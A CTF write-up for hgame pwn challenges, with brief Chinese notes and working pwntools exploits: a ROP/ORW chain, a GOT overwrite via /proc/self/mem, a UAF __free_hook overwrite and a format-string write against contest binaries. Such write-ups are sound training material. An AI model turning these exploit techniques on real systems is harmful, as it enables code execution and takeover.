hgame

rop_primary

矩阵相乘,算法分析用过numpy就直接调用numpy现有的库了,常规栈溢出,但是不知道为什么system的系统调用貌似被禁用了,所以用了orw,没拿shell

from pwn import*
import numpy as np
from LibcSearcher import*
context.log_level = 'debug'
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
elf = ELF('./rop_primary')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_got = elf.got['read']
read_plt = elf.plt['read']
open_plt = elf.plt['open']
prdi = 0x401613
prsi_r15 = 0x401611
leave_ret = 0x4015A6
p = remote('159.75.104.107',30372)
payload = ''
p.recvuntil('A:\n')
A = []
B = []
x = 0
n = 0
y = 0
while True:
	line = p.recvuntil('\n').replace('\t',' ')[:-2]
	print line
	if line[0]=='B':
		break
	else:
		A.append(np.array(line.split(),int))
		x = x+1
n = len(A[0])
for i in range(n):
	line = p.recvuntil('\n').replace('\t',' ')[:-2]
	print line
	B.append(np.array(line.split(),int))
y = len(B[0])
c = np.dot(A,B)
print c
for i in range(x):
	for j in range(y):
		p.sendline(str(c[i][j]))
payload = 'a'*0x38+p64(prdi)+p64(read_got)+p64(puts_plt) + p64(0x40157b)
p.sendlineafter('best\n',payload)

libcbase = u64(p.recv(6)+'\x00\x00') - 0x111130
prdx_r12 = libcbase + 0x11c371
write = libcbase + 0x1111d0
pr('libcbase',libcbase)
payload = 'a'*0x30+p64(0x404000+0x500)+p64(prdi)+p64(0)+p64(prsi_r15)+p64(0x404000+0x500)+p64(0)+p64(prdx_r12)+p64(0x300)+p64(0)+p64(read_plt)+p64(leave_ret)
p.sendlineafter('best\n',payload)
payload = p64(0)+p64(prdi)+p64(0)+p64(prsi_r15)+p64(0x404000+0x300)+p64(0)+p64(prdx_r12)+p64(0x100)+p64(0)+p64(read_plt)
payload += p64(prdi)+ p64(0x404000+0x300)+p64(prsi_r15)+p64(0)+p64(0)+p64(prdx_r12)+p64(0)+p64(0)+p64(open_plt)
payload += p64(prdi)+p64(3)+p64(prsi_r15)+p64(0x404000+0x300)+p64(0)+p64(prdx_r12)+p64(0x100)+p64(0)+p64(read_plt)
payload += p64(prdi)+p64(1)+p64(prsi_r15)+p64(0x404000+0x300)+p64(0)+p64(prdx_r12)+p64(0x100)+p64(0)+p64(write)
p.sendline(payload)
p.send('flag'+p64(0))
p.interactive()

the_shop_of_cosmos

卡了一会的题目,一开始只知道/proc/self/maps可以做泄露,但不知道/proc/self/mem可以修改内存。知道/proc/self/mem之后就很好做了,打got表就行。

from pwn import*
context.log_level = 'debug'
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
#p = process('./shop')
libc = ELF('./libc.so.6')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = remote('159.75.104.107',30398)
elf = ELF('./shop')
pbase = 0x555555554000
atoll_got = elf.got['atoll']
p.sendlineafter('>> ','3')
p.sendlineafter('>> ','-10')
p.sendlineafter('>> ','2')
p.sendlineafter('>> ','1')
p.sendlineafter('>> ','/proc/self/maps')
p.recvuntil('shop\n')
pbase = int('0x'+p.recvuntil('-')[:-1],16) - 0x1000
p.recvuntil('7f')
libcbase = int('0x7f'+p.recvuntil('-')[:-1],16)
atoll_got += pbase
system = libcbase + libc.sym['system']
pr('pbase',pbase)
pr('libcbase',libcbase)
pr('atoll_got',atoll_got)
p.sendlineafter('>> ','3')
p.sendlineafter('>> ','1')
p.sendlineafter('>> ','/proc/self/mem')
p.sendlineafter('>> ',str(atoll_got))
p.sendlineafter('>> ','8')
p.sendafter('>> ',p64(system))
p.sendlineafter('>> ','sh')
#gdb.attach(p)
p.interactive()

patriot’s note

常规堆题,uaf,glibc2.27,打__free_hook。

from pwn import*
context.log_level = 'debug'
#p = process('./note')
p = remote('159.75.104.107',30369)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pbase = 0x0000555555554000
onegadget = [0x4f3d5,0x4f432,0x10a41c]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
def add(size):
	p.sendlineafter('5.exit\n','1')
	p.sendlineafter('write?\n',str(size))

def delete(index):
	p.sendlineafter('5.exit\n','2')
	p.sendlineafter('delete?\n',str(index))

def edit(index,ct):
	p.sendlineafter('5.exit\n','3')
	p.sendlineafter('edit?\n',str(index))
	p.send(ct)

def show(index):
	p.sendlineafter('5.exit\n','4')
	p.sendlineafter('show?\n',str(index))

add(0x500) #0
add(0x10) #1
add(0x10) #2
delete(0)
show(0)
libcbase = u64(p.recv(8)) - (0x7ffff7dcdca0-0x7ffff79e2000)
free_hook = libcbase + libc.sym['__free_hook']
one = libcbase + onegadget[1]
pr('libcbase',libcbase)
pr('free_hook',free_hook)
pr('one',one)
delete(1)
edit(1,p64(free_hook))
add(0x10) #3
add(0x10) #4
edit(4,p64(one))
delete(4)
#gdb.attach(p,'b *'+str(one))
p.interactive()

killerqueen

格式化字符串,本来想单字节单字节写的,发现栈不够用就双字节写了。

from pwn import*
context.log_level = 'debug'
#p = process('./killerqueen')
p = remote('159.75.104.107',30339)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pbase = 0x0000555555554000

onegadget = [0x4f3d5,0x4f432,0x10a41c]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
p.recv()
p.sendline('0')
weather = int(p.recvuntil(':')[:-1],10)
pr('weather',weather)
p.recv()
p.sendline('tty')
p.send('a')
p.recv()
p.sendline(str(0xFFFFFFFE-weather))
#gdb.attach(p,'b *'+str(pbase+0xC79))
p.recv()
p.send('%24$p-%47$p-%38$p-')
p.recvuntil('0x')
pbase = int('0x'+p.recvuntil('-')[:-1],16) - 0x10b8
libcbase = int(p.recvuntil('-')[:-1],16) - 231 - libc.sym['__libc_start_main']
stackleak = int(p.recvuntil('-')[:-1],16) - 40
one = libcbase + onegadget[2]
pr('pbase',pbase)
pr('libcbase',libcbase)
pr('stackleak',stackleak)
pr('one',one)
payload = ''
a = one & 0xffff
payload += '%'+str(a)+'c'+'%12$hn'
one = one >> 16
a = (one & 0xffff) - a
payload += '%'+str(a)+'c'+'%13$hn'
a = 0x10000+(one>>16) - (one&0xffff)
payload += '%'+str(a)+'c'+'%14$hn'
payload = payload.ljust(0x30,'\x00')
for i in range(3):
	payload += p64(stackleak+i*2)

print payload
p.recv()
p.sendline(payload)
p.sendline('1')
#gdb.attach(p,'b *'+str(one))
p.interactive()